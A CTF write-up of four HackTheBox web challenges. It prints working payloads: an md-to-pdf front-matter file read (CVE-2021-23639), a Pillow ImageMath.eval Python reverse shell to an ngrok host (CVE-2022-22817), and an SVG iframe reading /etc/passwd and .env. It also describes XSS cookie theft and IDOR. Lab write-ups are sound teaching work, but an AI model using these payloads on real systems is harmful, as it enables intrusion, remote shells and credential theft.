Cyber Apocalypse CTF 2022 — HackTheBox

Abdul Wassay (HotPlugin)
Published in System Weakness
May 19, 2022

Introduction:

Cyber Apocalypse was an intermediate-to-expert level, 5-day CTF hosted by HackTheBox. It had around 60+ challenges divided into 7 categories. I was able to solve a total of 8 challenges from different categories. This writeup covers the 4 web challenges that I solved. There’s another writeup covering the reversing and forensics challenges (Read it here).

Challenges:

1. Kryptos Support:

Solution:

Given the challenge description, we have to gain access to the system. Starting the challenge and navigating to the provided URL, we see the following page. The page contains a text box, a send button and a Backend button in the left corner.

Putting something in the text box and clicking the send button results in the following.

Other than that, the Backend button navigates to a login form. I tried some default creds but nothing worked.

So, the idea here was to steal the admin’s cookies using XSS via a support ticket. For this, I used XSS Hunter, which provides an easy way to exploit XSS. I chose the following payload.

Paste the payload from XSS Hunter into the text field and send it.

Checking the Fires tab in XSS Hunter, we get a successful hit from the target.

Reviewing the full report, we get the following session cookie.

I copied the cookie and added it in the challenge website’s cookies section.

Now, navigating to the /tickets page as shown in the above report, we get logged in as moderator. Again, there’s a settings button in the left corner.

http://46.101.27.51:31892/tickets

Clicking the settings button redirects to a password change form. The best thing is that it doesn’t ask for the current password. So, we change the password for the moderator.

But, analyzing the request in Burp Suite, it sends the password and also a user id.

Send the request to Burp Repeater and test for IDOR. Changing the uid to 1 successfully changes the admin’s password.

Logging in as admin, we get the flag.

2. Blinker Fluid:

Solution:

Navigating to the challenge website, we get the following page.

Clicking on create new invoice opens an editor that takes the invoice data in markdown format.

Save the invoice and it gets listed.

Clicking on export, it gets exported as a PDF.

Since it converts the given markdown to PDF, I searched for md-to-pdf vulnerabilities and found that it’s vulnerable to the following CVE.

CVE-2021-23639

Since we also got the source code with the challenge, looking at the package.json file, we can confirm the version of the package.

I also confirmed that it’s used to make the PDF.

So, I went to the md-to-pdf package’s repo on GitHub and searched for the vulnerability in the issues.

Looking at the issue, it also had a PoC. But this PoC didn’t work on our challenge.

So, looking at the comments on the issue, someone had mentioned a modified version of the PoC.

The above PoC basically uses the readdirSync function, which takes a path as input and returns the listing of that path. So, I copied the PoC and pasted it in the create new invoice editor.

---js
{
css: `body::before { content: "${require('fs').readdirSync('/').join()}"; display: block }`,
}
---

Saved the invoice and then exported it as PDF, and we successfully get the listing of the root directory on the server. It also has a flag.txt file.

So now, instead of the readdir function, I used the readFileSync function and provided it the path of the flag file.

---js
{
css: `body::before { content: "${require('fs').readFileSync('/flag.txt', 'utf-8')}"; display: block }`,
}
---

Then, create a new invoice, paste the above PoC and save it. Lastly, exporting the invoice as PDF, we get the flag.
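The front-matter trick above works because gray-matter (used by md-to-pdf) treats a `---js` block as code to evaluate. As an added example that is not the challenge’s or md-to-pdf’s code, here is an input check an invoice service could run before handing markdown to the converter, alongside upgrading the package. Function names are assumptions.

```javascript
// Added example (not the challenge's or md-to-pdf's code): refuse markdown whose front
// matter selects a code-executing engine before it ever reaches md-to-pdf. gray-matter
// evaluates "---js" / "---javascript" front matter, which is what the CVE-2021-23639
// PoC above abuses.
const EXECUTABLE_ENGINES = new Set(['js', 'javascript']);

// Returns { ok: true } for plain markdown or data-only (YAML/JSON) front matter, and
// { ok: false, engine } when the front matter names an engine that evaluates code.
function checkInvoiceMarkdown(markdown) {
  // gray-matter accepts an optional language after the opening delimiter, e.g. "---js".
  const opener = /^(?:\uFEFF)?---[ \t]*([A-Za-z]+)?[ \t]*\r?\n/;
  const m = opener.exec(markdown);
  if (!m) return { ok: true };            // no front matter at all
  const engine = (m[1] || 'yaml').toLowerCase();
  if (EXECUTABLE_ENGINES.has(engine)) return { ok: false, engine };
  return { ok: true, engine };
}

// Defence in depth: drop any leading front matter block entirely, so invoice text
// is rendered as markdown only and never reaches a front-matter engine.
function stripFrontMatter(markdown) {
  const block = /^(?:\uFEFF)?---[ \t]*[A-Za-z]*[ \t]*\r?\n[\s\S]*?\r?\n---[ \t]*(?:\r?\n|$)/;
  return markdown.replace(block, '');
}
```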

3. Amidst Us:

Solution:

This was a very interesting challenge. Navigating to the provided URL, we get the following page. The whole page is dark and our cursor works like a torch. There was a spaceship as shown below; clicking on it asks for an image file upload.

Uploading the image, it gets listed in the left corner.

Analyzing the POST request, we can see it sends the data as JSON and the uploaded image is also converted to base64.

Since we had the source code available for this challenge, we go to the source code to see what’s happening under the hood. It was a Python web app.

Looking at the routes, we see that the JSON data from the POST request is passed to the make_alpha function.

Looking at the make_alpha function, it first retrieves the background field from the JSON data and saves it in the color variable as a list. Then, it gets the image field, base64 decodes it, converts it back into an image and extracts the RGB color bands from it. Then, it performs some calculations on the image pixels using the ImageMath.eval function from the Pillow library.

There’s also a requirements file which mentions the version of the Pillow library.

Searching for vulnerabilities in that Pillow version, we get a pretty recent CVE, which allows arbitrary expression evaluation in the ImageMath.eval function.

CVE-2022-22817

So, looking through the source code again, we see that the only field that we control and which is directly passed into the vulnerable function is the background field.

Looking at the request in Burp Suite again, we see that the background parameter is passed at the end and contains an array. So, we can inject into this parameter and get a reverse shell on the server.

Since this is a public server, we use ngrok, which provides a public interface to listen for requests and port forwards them to our specified port on localhost. We also start netcat on our localhost on the same port as specified in ngrok.

Then, I crafted the following payload, which is just reverse shell code inside an exec call, which executes the provided code in the Python interpreter. We specify the address and port provided by ngrok.

"exec('socket=__import__(\"socket\");os=__import__(\"os\");pty=__import__(\"pty\");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0.tcp.in.ngrok.io\",12113));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")')"

Lastly, we inject the above payload into the background field and send the request.

Looking at ngrok, we get 1 connection hit, and on netcat we successfully get a reverse shell on the server.

Looking at the root path, we get the flag.

4. Mutation Lab:

Solution:

Navigating to the challenge website, we get the following login page. Trying some default passwords for admin doesn’t work, nor does SQLi.

So, register a new user and then login. Redirected to the dashboard, we get the following page. It contains some GIFs, or I don’t know, just moving pictures. There’s also a button to export the pictures.

At the end of the page, it says the following, which kind of gives us the idea that we need to login as admin to solve the challenge.

Other than that, clicking on export cell structure exports the moving pictures as PNG.

Also, looking at the website cookies, it contains a base64 encoded session cookie and a signature for the cookie.

Base64 decoding the session cookie, it just contains a username field. We can try to base64 encode a new cookie and replace the old one, but that will not work as the signature won’t match.

So, the next thing is to analyze the requests in Burp Suite proxy history. It can be seen that when exporting the cell structure, it is sent as SVG and the server converts the SVG into PNG.

Searching for svg-to-png vulnerabilities, we get the following CVE.

CVE-2021-23631

It also provides a PoC which tries to read the /etc/passwd file.

So, I copied the SVG payload from the above PoC, replaced it in the request and sent it, and we get a PNG file path as the response.

<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>

Download the PNG using wget on my box,

and opening it, we get the contents of the /etc/passwd file from the server.

Using this payload, we could not get the flag since we don’t know the flag’s location. The other thing we can do is retrieve the source code of this website. So, instead of /etc/passwd, we change it to read /app/index.js and send the request.

Download the PNG from the response and, opening it, we get the content of the index.js file. The one thing of interest is the path of the secret that is used to sign the session cookie.

So, we read the .env file which contains the secret.

Here’s the secret after downloading the pic.

Lastly, I wrote a simple web server to forge the admin cookie using the found secret.

Start the web server and, looking in the cookie editor, we get the cookies.

We can confirm that it’s an admin cookie by base64 decoding it.

Finally, we replace the session and session signature cookies on the website with the newly forged cookies. Navigating to the dashboard, we get logged in as admin and get the flag.

Thanks.
